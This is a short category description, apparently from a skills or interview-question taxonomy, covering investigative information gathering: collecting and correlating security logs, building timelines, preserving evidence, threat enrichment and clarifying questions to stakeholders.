Investigation and Information Gathering Questions

Skills and methods for systematically collecting, validating, and organizing information during investigations and when clarifying ambiguous situations. Covers technical evidence collection such as gathering relevant logs from security information and event management systems, firewalls, endpoints, applications and other telemetry; correlating data across sources; building timelines of events; identifying affected systems and users; and preserving evidence and chain of custody where required. Also covers threat context and enrichment, for example determining whether an external internet address or indicator is known to be malicious and whether observed patterns match known threat actors. Includes the communication and clarification side of information gathering: asking targeted clarifying questions to stakeholders, understanding what factual details matter for legal or business analysis, prioritizing missing information, working effectively with incomplete data, and obtaining necessary inputs from business owners in a time efficient manner. Emphasizes judgment about evidence versus circumstantial information, efficient triage and prioritization of collection steps, and balancing technical, legal, and business concerns when assembling a coherent investigation narrative.